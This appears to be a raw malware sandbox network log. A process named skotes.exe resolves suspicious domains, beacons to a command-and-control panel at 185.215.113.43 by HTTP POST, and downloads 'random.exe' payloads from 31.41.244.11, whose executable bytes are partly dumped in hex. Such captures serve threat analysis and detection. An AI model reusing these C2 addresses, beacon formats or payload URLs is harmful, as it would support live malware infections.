                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:07.098660946 CET1.1.1.1192.168.2.40xcbdfNo error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:07.098660946 CET1.1.1.1192.168.2.40xcbdfNo error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:15.259036064 CET1.1.1.1192.168.2.40x2No error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:15.259355068 CET1.1.1.1192.168.2.40x19aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:22.658952951 CET1.1.1.1192.168.2.40x979bName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:22.821322918 CET1.1.1.1192.168.2.40xb5ffName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:44.745693922 CET1.1.1.1192.168.2.40xc7c8No error (0)twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:44.791152000 CET1.1.1.1192.168.2.40xc7c8No error (0)twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.985203028 CET1.1.1.1192.168.2.40xa3a9No error (0)twentytk20ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:55.990314007 CET1.1.1.1192.168.2.40x245No error (0)cheapptaxysu.click104.21.67.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:55.990314007 CET1.1.1.1192.168.2.40x245No error (0)cheapptaxysu.click172.67.177.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:58.173777103 CET1.1.1.1192.168.2.40xb453Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:58.339179039 CET1.1.1.1192.168.2.40xfec7Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:01.313415051 CET1.1.1.1192.168.2.40xf27cNo error (0)www.google.com172.217.19.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:01.313436031 CET1.1.1.1192.168.2.40x87d0No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.449758185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:03.943247080 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:05.303036928 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:05 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.449764185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:06.933882952 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.298841953 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:08 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 35 64 39 0d 0a 20 3c 63 3e 31 30 31 39 36 36 33 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 65 30 36 64 39 64 34 61 34 33 62 61 34 61 65 38 31 63 31 36 30 33 34 37 39 39 64 32 65 30 31 37 62 66 65 33 64 31 34 38 32 62 23 31 30 31 39 36 36 34 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 64 37 65 38 36 34 34 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 39 36 36 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 30 37 65 38 30 34 64 30 33 61 63 35 32 65 61 34 38 34 62 34 31 31 62 39 64 63 34 65 31 23 31 30 31 39 36 36 38 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: 5d9 <c>1019663001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbe06d9d4a43ba4ae81c16034799d2e017bfe3d1482b#1019664001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1019667001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc07e804d03ac52ea484b411b9dc4e1#1019668001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1019669001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1019670001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1019671001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1019672001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1019673001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1019674001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1019675001+++b5937c1a99d5f9df0b5dafc8 [TRUNCATED]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.298976898 CET124INData Raw: 33 35 36 34 64 35 62 39 63 64 33 65 39 35 36 62 37 62 35 64 31 23 31 30 31 39 36 37 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65
                                                                                                                                                                                                                                                            Data Ascii: 3564d5b9cd3e956b7b5d1#1019676001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd1779b464dac58eb03564d5b9cd3e956b7b5d
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.536870956 CET328INData Raw: 31 23 31 30 31 39 36 37 37 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 63 30 37 65 38 30 34 35 34 64 62 30 34 35 65
                                                                                                                                                                                                                                                            Data Ascii: 1#1019677001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc07e80454db045e5404b5a0dc093f619bca9db5d60e66725#1019678001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#1019679001+++b5937c1a99d5f9


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.44977031.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:08.660515070 CET65OUTGET /files/Krokodyl02/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986558914 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:09 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 2668544
                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 08:45:32 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "6766802c-28b800"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 ca 47 72 61 ab 29 21 61 ab 29 21 61 ab 29 21 13 2a 2a 20 6c ab 29 21 13 2a 2c 20 f5 ab 29 21 13 2a 2d 20 72 ab 29 21 70 2d 2a 20 73 ab 29 21 70 2d 2d 20 71 ab 29 21 70 2d 2c 20 47 ab 29 21 13 2a 28 20 64 ab 29 21 61 ab 28 21 3f ab 29 21 e2 2d 21 20 60 ab 29 21 e2 2d d6 21 60 ab 29 21 e2 2d 2b 20 60 ab 29 21 52 69 63 68 61 ab 29 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f4 a8 65 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 aa 26 00 00 1c 02 00 00 00 00 00 50 a5 23 00 00 10 00 00 00 c0 26 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$%Gra)!a)!a)!** l)!*, )!*- r)!p-* s)!p-- q)!p-, G)!*( d)!a(!?)!-! `)!-!`)!-+ `)!Richa)!PELeg*&P#&@)(@'<'}(j'T@'@&@.text&& `.rdata,&&@@.data''@.fptable''@.rsrc}''@@.relocj(lL(@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986800909 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 10 8b c1 69 4d 14 53 72 84 7a 89 45 fc c1 7d fc fd 98 01 05
                                                                                                                                                                                                                                                            Data Ascii: UiMSrzE}gB%f+gSVuW=4gEEiN=YiSrz=4g8{Muuabb}@M=4gUr2i]{/eMie+m~]yf[
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986838102 CET1236INData Raw: ea d2 27 57 73 e9 77 06 00 00 81 fb c1 d8 7b 2f 73 38 0f af 05 1c c9 67 00 8a 4d fc 80 c1 43 66 d3 3d 00 c9 67 00 a3 1c c9 67 00 b8 61 09 cf e9 2b c2 03 d8 b8 9b ff 00 00 2b 45 10 66 01 05 0c c9 67 00 33 d2 e9 37 06 00 00 81 f9 5e 77 a5 28 75 67
                                                                                                                                                                                                                                                            Data Ascii: 'Wsw{/s8gMCf=gga++Efg37^w(ugfEfLgm2MEgfgg,g-ggggiApO}+-gfH@rc?'fLg+E$:M8gg
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.986872911 CET224INData Raw: bb 47 00 00 98 01 05 24 c9 67 00 e9 9d 01 00 00 81 ff 66 af 48 40 75 2b 0f b6 05 03 c9 67 00 81 eb b6 2d be 49 0f b6 cb 81 c2 26 87 3c 64 0f af c8 81 6d 08 9f 86 1c 76 88 0d 03 c9 67 00 e9 6a 01 00 00 3b 5d 14 76 47 8b 45 14 01 15 30 c9 67 00 05
                                                                                                                                                                                                                                                            Data Ascii: G$gfH@u+g-I&<dmvgj;]vGE0gkU<gM;3GE@giE "-@qM-gE;3Gsu)gfc@gfHgAgeEgii^w(MgE
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987010002 CET1236INData Raw: 10 81 ea 65 85 bb 0e 01 05 18 c9 67 00 81 c3 7e f2 a3 7d 0f bf c1 0f bf 0d 28 c9 67 00 0f af c8 66 89 0d 28 c9 67 00 e9 a1 00 00 00 3d 4e 3d 59 d4 75 67 01 15 38 c9 67 00 8b cb 0f bf 05 44 c9 67 00 d3 2d 04 c9 67 00 66 8b 4d 14 01 35 10 c9 67 00
                                                                                                                                                                                                                                                            Data Ascii: eg~}(gf(g=N=Yug8gDg-gfM5g5@gEkeEf gEff9f+fDgU,g;cE3$g "U4gg3),gE!G4gg$"q+Efg3-g_^
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987044096 CET1236INData Raw: 00 00 00 03 c2 c7 45 b0 da a1 34 5b 89 85 7c ff ff ff 69 c3 e1 57 00 00 05 06 26 00 00 0f b7 d8 66 a1 00 c9 67 00 66 8b cb 66 d3 f8 8b 4d f4 66 89 45 e6 81 e9 ad 6b 43 25 a1 24 c9 67 00 05 e0 38 00 00 89 5d fc 0f b7 c0 2b df 89 45 90 89 45 9c a1
                                                                                                                                                                                                                                                            Data Ascii: E4[|iW&fgffMfEkC%$g8]+EE@gX@MEU)gf<E,lED@]]EE8uMUf}4H;$lF?MOld
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987078905 CET1236INData Raw: 67 00 66 8b 7d ee d2 e8 a2 0e c9 67 00 0f b6 c0 66 2b c2 89 35 24 c9 67 00 0f b7 35 10 c9 67 00 8b d1 66 03 c6 8b 4d f4 66 01 45 bc 81 ea a5 55 da 28 b8 9c 01 00 00 89 55 f8 89 45 84 89 85 70 ff ff ff 8b 85 5c ff ff ff 66 03 c7 89 85 5c ff ff ff
                                                                                                                                                                                                                                                            Data Ascii: gf}gf+5$g5gfMfEU(UEp\f\f g$gEEH<gEEC4EEE0Mu|E}gx$+EpffEf8g$g
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987685919 CET1236INData Raw: 0f bf c7 8b ca 0f af 05 3c c9 67 00 d3 3d 38 c9 67 00 0f b6 8d 50 ff ff ff d3 6d e8 89 55 f8 a3 3c c9 67 00 8b 85 5c ff ff ff 0f b7 d3 66 2b c2 0f b6 4d b4 89 85 5c ff ff ff 66 a3 20 c9 67 00 8b 85 58 ff ff ff 89 5d f4 8b 5d f8 03 c3 89 85 58 ff
                                                                                                                                                                                                                                                            Data Ascii: <g=8gPmU<g\f+M\f gX]]X@g8gEfMuuEq+,gEEpLEEE5f}f}Tf]TfLg+fEMEU]MEEg
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987720013 CET1236INData Raw: 05 aa d4 17 2b c8 c1 fb c4 8b 45 b4 66 8b fb 89 4d 98 0f b6 0d 44 c9 67 00 d2 e8 02 85 4c ff ff ff 89 45 b4 8b 85 50 ff ff ff 8b 8d 74 ff ff ff 0f b6 c0 29 45 d8 8b 45 f0 0f b6 c0 69 c0 c7 00 00 00 89 8d 74 ff ff ff 89 5d a4 89 5d fc 66 89 7d ee
                                                                                                                                                                                                                                                            Data Ascii: +EfMDgLEPt)EEit]]f}EgghMhFB`8gkMEE.(>UU;MM GMg0}E8Ei8fUmm
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:09.987756014 CET1236INData Raw: c0 66 8b ca 03 05 08 c9 67 00 66 d3 ff 89 45 c0 66 8b cf a1 10 c9 67 00 03 85 7c ff ff ff 03 05 24 c9 67 00 66 d3 eb 8b 4d dc 81 c1 ff 7e 41 a5 66 89 7d fc 03 c8 66 89 1d 0c c9 67 00 8b 5d fc 8b 45 e8 03 da 89 4d dc 8b d6 0f bf 8d 60 ff ff ff 66
                                                                                                                                                                                                                                                            Data Ascii: fgfEfg|$gfM~Af}fg]EM`f+]Cz]MUf}UU;Ul`-'Ul}gd3Eg4gkUEE+gEfjEEf)Dg|f+
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:10.106225014 CET1236INData Raw: 29 45 ac 89 5d f4 66 89 7d fc 03 cb c7 45 80 51 39 14 aa 8b 5d fc 89 0d 10 c9 67 00 8b 4d f4 89 55 f8 66 89 7d ee c7 45 d4 6b 1d a9 f2 89 5d a4 e9 90 0b 00 00 8b 75 08 39 b5 48 ff ff ff 8b 75 c4 0f 8e 1e 01 00 00 81 c1 e7 55 8a 1b 8b 75 dc 69 c3
                                                                                                                                                                                                                                                            Data Ascii: )E]f}EQ9]gMUf}Ek]u9HuUui<?]Mm2q3EVo|gEfm}gTfEp,gEUEGE:Z$g0gI&EkxEtU)|


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.449786185.215.113.43801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:16.779278994 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 64 31 3d 31 30 31 39 36 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                            Data Ascii: d1=1019663001&unit=246122658369
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.114068985 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.44979131.41.244.11801740C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:18.242862940 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: 31.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568140030 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:16:19 GMT
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Content-Length: 776832
                                                                                                                                                                                                                                                            Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            ETag: "6761482a-bda80"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568185091 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568227053 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568382025 CET1236INData Raw: 8b 6c 24 0c 8d 74 24 14 c6 07 00 68 35 02 00 00 56 e8 6d fe ff ff 83 c4 08 89 c7 3b 44 24 48 75 1a 8b 44 1d 24 8b 4c 24 04 0f b7 04 01 8b 4c 1d 1c 01 d9 8b 04 81 89 04 24 eb 05 83 44 24 08 04 8b 44 24 28 83 f8 10 72 2d 8b 4c 24 14 8d 70 01 81 fe
                                                                                                                                                                                                                                                            Data Ascii: l$t$h5Vm;D$HuD$L$L$D$D$(r-L$prQ) sT$VQl$;|$HtD$$4$L$,10^_[]*-USWV$$$ WB1$1
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568418980 CET1236INData Raw: ff ff 83 ec 14 0f 28 05 10 c0 41 00 0f 11 44 24 04 89 1c 24 c7 44 24 18 00 00 00 00 c7 44 24 14 80 00 00 00 ff d0 83 f8 ff 0f 84 ab 01 00 00 89 c7 6a 00 50 ff 15 98 39 42 00 83 f8 ff 0f 84 70 01 00 00 89 c3 50 e8 1c 13 00 00 83 c4 04 89 c5 8d 44
                                                                                                                                                                                                                                                            Data Ascii: (AD$$D$D$jP9BpPD$jPSUW,:BBW49BE<L=l$$D$\$L$WD$ WD$Uv+w|$ D$$WUS`K
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.568455935 CET672INData Raw: 08 89 f1 52 57 e8 0b 00 00 00 68 f8 41 42 00 56 e8 80 3f 00 00 56 89 ce 8b 44 24 0c ff 74 24 08 ff 70 04 ff 30 e8 f9 02 00 00 c7 06 10 c2 41 00 89 f0 5e c2 08 00 cc 57 56 89 ce 8b 7c 24 0c c7 01 28 c1 41 00 8d 41 04 31 c9 89 4e 08 89 4e 04 8d 4f
                                                                                                                                                                                                                                                            Data Ascii: RWhABV?VD$t$p0A^WV|$(AA1NNOPQEAGONFA^_WV|$(AA1NNOPQDAGONF\A^_WV|$(AA1NNOPQDAG
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569024086 CET1236INData Raw: c2 08 00 e8 93 fa ff ff cc 8b 44 24 04 8b 54 24 08 89 10 89 48 04 c2 08 00 8b 44 24 04 8b 10 8b 40 04 8b 49 04 33 48 04 33 54 24 08 09 ca 0f 94 c0 c2 08 00 cc 53 57 56 83 ec 0c 8b 74 24 20 8b 44 24 1c 8b 15 c0 57 42 00 31 e2 89 54 24 08 8b 11 89
                                                                                                                                                                                                                                                            Data Ascii: D$T$HD$@I3H3T$SWVt$ D$WB1T$PWROVI3J3L$1^_[USWVWB1D$WD$W$t$8l$4\$0wx@Wt$<PXQ
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569081068 CET1236INData Raw: 01 fb 8b 74 24 20 56 ff 74 24 20 53 e8 96 54 00 00 83 c4 0c c6 04 1e 00 89 7d 00 89 e8 83 c4 08 5e 5f 5b 5d c2 08 00 89 f8 83 c8 0f 01 d1 39 c8 89 ce 0f 47 f0 89 f0 40 75 0a 31 c0 31 f6 4e e9 13 ff ff ff 3d 00 10 00 00 0f 83 fb fe ff ff 50 e8 64
                                                                                                                                                                                                                                                            Data Ascii: t$ Vt$ ST}^_[]9G@u11N=PdhkV@|u.Dt%L8P4u@DjP}^WVWB1D$V&t!@L8D$Pf1HT
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.569116116 CET448INData Raw: 57 56 8b 5c 24 14 8b 74 24 10 39 de 74 1b 89 cf 83 c7 08 0f b6 06 57 50 e8 f6 21 00 00 83 c4 08 88 06 46 39 de 75 ec 89 de 89 f0 5e 5f 5b c2 08 00 0f b6 44 24 04 83 c1 08 51 50 e8 d3 21 00 00 83 c4 08 c2 04 00 cc 56 8b 44 24 08 8b 74 24 0c 89 f1
                                                                                                                                                                                                                                                            Data Ascii: WV\$t$9tWP!F9u^_[D$QP!VD$t$)QPt$tO^D$VD$t$)QPt$JO^D$Vy~vxv^FtPVD$(A1VVQP78
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:19.570014000 CET1236INData Raw: 1c 00 00 b9 cc 69 42 00 e8 ef 03 00 00 68 88 b8 41 00 e8 45 01 00 00 59 c3 68 92 b8 41 00 e8 39 01 00 00 59 c3 55 8b ec eb 0d ff 75 08 e8 a9 65 00 00 59 85 c0 74 0f ff 75 08 e8 28 a0 00 00 59 85 c0 74 e6 5d c3 83 7d 08 ff 0f 84 f2 20 00 00 e9 31
